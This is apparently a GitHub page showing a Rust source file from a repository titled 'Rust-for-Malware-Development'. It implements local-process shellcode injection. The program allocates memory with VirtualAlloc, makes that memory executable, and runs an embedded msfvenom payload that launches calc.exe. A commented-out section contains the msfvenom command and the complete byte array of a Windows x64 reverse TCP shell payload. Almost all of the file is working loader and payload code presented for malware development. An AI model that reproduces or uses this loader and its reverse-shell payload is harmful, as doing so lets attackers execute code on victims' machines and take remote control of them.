forked from Whitecat18/Rust-for-Malware-Development
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathinject_on_localprocess.rs
137 lines (118 loc) · 6.54 KB
/
inject_on_localprocess.rs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
/*
CreateRemoteThread ShellCode Injection : LocalProcess
For more Codes: https://github.com/Whitecat18/Rust-for-Malware-Development.git
@5mukx
*/
use std::ptr::null_mut;
use winapi::um::memoryapi::{VirtualAlloc, VirtualProtect};
macro_rules! okey{
($msg:expr, $($arg:expr), *) => {
println!("\\____[+] {}", format!($msg, $($arg),*));
}
}
macro_rules! error {
($msg:expr, $($arg:expr), *) => {
println!("\\____[-] {}", format!($msg, $($arg), *));
println!("Exiting ...");
std::process::exit(0);
}
}
fn main(){
// MSFPAYLOAD !
//msfvenom -p windows/x64/shell_reverse_tcp LHOST=eth0 LPORT=443 -f rust -b \x00\x0a\x0d
// let buf: [u8; 503] = [0x48,0x31,0xc9,0x48,0x81,0xe9,0xc6,
// 0xff,0xff,0xff,0x48,0x8d,0x05,0xef,0xff,0xff,0xff,0x48,0xbb,
// 0x90,0x2a,0x5b,0x02,0xfe,0x59,0xda,0xcc,0x48,0x31,0x58,0x27,
// 0x48,0x2d,0xf8,0xff,0xff,0xff,0xe2,0xf4,0x6c,0x62,0xd8,0xe6,
// 0x0e,0xb1,0x1a,0xcc,0x90,0x2a,0x1a,0x53,0xbf,0x09,0x88,0x9d,
// 0xc6,0x62,0x6a,0xd0,0x9b,0x11,0x51,0x9e,0xf0,0x62,0xd0,0x50,
// 0xe6,0x11,0x51,0x9e,0xb0,0x62,0xd0,0x70,0xae,0x11,0xd5,0x7b,
// 0xda,0x60,0x16,0x33,0x37,0x11,0xeb,0x0c,0x3c,0x16,0x3a,0x7e,
// 0xfc,0x75,0xfa,0x8d,0x51,0xe3,0x56,0x43,0xff,0x98,0x38,0x21,
// 0xc2,0x6b,0x0a,0x4a,0x75,0x0b,0xfa,0x47,0xd2,0x16,0x13,0x03,
// 0x2e,0xd2,0x5a,0x44,0x90,0x2a,0x5b,0x4a,0x7b,0x99,0xae,0xab,
// 0xd8,0x2b,0x8b,0x52,0x75,0x11,0xc2,0x88,0x1b,0x6a,0x7b,0x4b,
// 0xff,0x89,0x39,0x9a,0xd8,0xd5,0x92,0x43,0x75,0x6d,0x52,0x84,
// 0x91,0xfc,0x16,0x33,0x37,0x11,0xeb,0x0c,0x3c,0x6b,0x9a,0xcb,
// 0xf3,0x18,0xdb,0x0d,0xa8,0xca,0x2e,0xf3,0xb2,0x5a,0x96,0xe8,
// 0x98,0x6f,0x62,0xd3,0x8b,0x81,0x82,0x88,0x1b,0x6a,0x7f,0x4b,
// 0xff,0x89,0xbc,0x8d,0x1b,0x26,0x13,0x46,0x75,0x19,0xc6,0x85,
// 0x91,0xfa,0x1a,0x89,0xfa,0xd1,0x92,0xcd,0x40,0x6b,0x03,0x43,
// 0xa6,0x07,0x83,0x96,0xd1,0x72,0x1a,0x5b,0xbf,0x03,0x92,0x4f,
// 0x7c,0x0a,0x1a,0x50,0x01,0xb9,0x82,0x8d,0xc9,0x70,0x13,0x89,
// 0xec,0xb0,0x8d,0x33,0x6f,0xd5,0x06,0x4b,0x40,0x2e,0xa9,0xfe,
// 0xcf,0x19,0x69,0x02,0xfe,0x18,0x8c,0x85,0x19,0xcc,0x13,0x83,
// 0x12,0xf9,0xdb,0xcc,0x90,0x63,0xd2,0xe7,0xb7,0xe5,0xd8,0xcc,
// 0x91,0x91,0x9b,0xaa,0x98,0x43,0x9b,0x98,0xd9,0xa3,0xbf,0x4e,
// 0x77,0xa8,0x9b,0x76,0xdc,0x5d,0x7d,0x05,0x01,0x8c,0x96,0x45,
// 0x7a,0x42,0x5a,0x03,0xfe,0x59,0x83,0x8d,0x2a,0x03,0xdb,0x69,
// 0xfe,0xa6,0x0f,0x9c,0xc0,0x67,0x6a,0xcb,0xb3,0x68,0x1a,0x84,
// 0x6f,0xea,0x13,0x8b,0x3c,0x11,0x25,0x0c,0xd8,0xa3,0x9a,0x43,
// 0x44,0xb3,0xd5,0x13,0x70,0xd5,0x8e,0x4a,0x77,0x9e,0xb0,0xdc,
// 0xd1,0x72,0x17,0x8b,0x1c,0x11,0x53,0x35,0xd1,0x90,0xc2,0xa7,
// 0x8a,0x38,0x25,0x19,0xd8,0xab,0x9f,0x42,0xfc,0x59,0xda,0x85,
// 0x28,0x49,0x36,0x66,0xfe,0x59,0xda,0xcc,0x90,0x6b,0x0b,0x43,
// 0xae,0x11,0x53,0x2e,0xc7,0x7d,0x0c,0x4f,0xcf,0x99,0xb0,0xc1,
// 0xc9,0x6b,0x0b,0xe0,0x02,0x3f,0x1d,0x88,0xb4,0x7e,0x5a,0x03,
// 0xb6,0xd4,0x9e,0xe8,0x88,0xec,0x5b,0x6a,0xb6,0xd0,0x3c,0x9a,
// 0xc0,0x6b,0x0b,0x43,0xae,0x18,0x8a,0x85,0x6f,0xea,0x1a,0x52,
// 0xb7,0xa6,0x12,0x81,0x19,0xeb,0x17,0x8b,0x3f,0x18,0x60,0xb5,
// 0x5c,0x15,0xdd,0xfd,0x2b,0x11,0xeb,0x1e,0xd8,0xd5,0x91,0x89,
// 0xf0,0x18,0x60,0xc4,0x17,0x37,0x3b,0xfd,0x2b,0xe2,0x2a,0x79,
// 0x32,0x7c,0x1a,0xb8,0x58,0xcc,0x67,0x51,0x6f,0xff,0x13,0x81,
// 0x3a,0x71,0xe6,0xca,0xec,0x20,0xdb,0xf9,0x1e,0x2c,0xdf,0x77,
// 0xd7,0x39,0x29,0x6d,0x94,0x59,0x83,0x8d,0x19,0xf0,0xa4,0xd7,
// 0xfe,0x59,0xda,0xcc];
// Testing msf calc payload !
let buf: [u8; 276] = [
0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52,
0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48,
0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9,
0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41,
0x01, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c, 0x48,
0x01, 0xd0, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x01,
0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44, 0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48,
0xff, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48, 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0,
0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x03, 0x4c,
0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0,
0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x41, 0x8b, 0x04,
0x88, 0x48, 0x01, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59,
0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x48,
0x8b, 0x12, 0xe9, 0x57, 0xff, 0xff, 0xff, 0x5d, 0x48, 0xba, 0x01, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d, 0x01, 0x01, 0x00, 0x00, 0x41, 0xba, 0x31, 0x8b, 0x6f,
0x87, 0xff, 0xd5, 0xbb, 0xf0, 0xb5, 0xa2, 0x56, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff,
0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb,
0x47, 0x13, 0x72, 0x6f, 0x6a, 0x00, 0x59, 0x41, 0x89, 0xda, 0xff, 0xd5, 0x63, 0x61, 0x6c,
0x63, 0x2e, 0x65, 0x78, 0x65, 0x00,
];
unsafe{
let exec = VirtualAlloc(
null_mut(),
buf.len(),
0x1000,
0x04,
);
if exec.is_null(){
error!("VirtualAlloc Error: {:?}",exec);
}
println!("| Executing SC in LocalProcess");
okey!("VirtualAlloc : {:?}",exec);
std::ptr::copy_nonoverlapping(buf.as_ptr(), exec as *mut u8, buf.len());
// we are changing mem protection to allow execution
let mut old_protect:u32 = 0;
let protect_addr = VirtualProtect(exec,
buf.len(),
0x40, // PAGE_EXECUTIVE_READWRITE
&mut old_protect
);
okey!("VirtualProtect : {:?}",protect_addr);
// Here i am converting mem addr to an function pointer and calling it
let func: fn() -> () = std::mem::transmute(exec);
okey!("Executing Payload {}","--->");
func();
// To revent the mem protection you can do by this way !
// VirtualProtect(exec, buf.len(), old_protect, &mut old_protect);
// Free up allocated mem
// VirtualFree(exec, 0, MEM_RELEASE);
}
}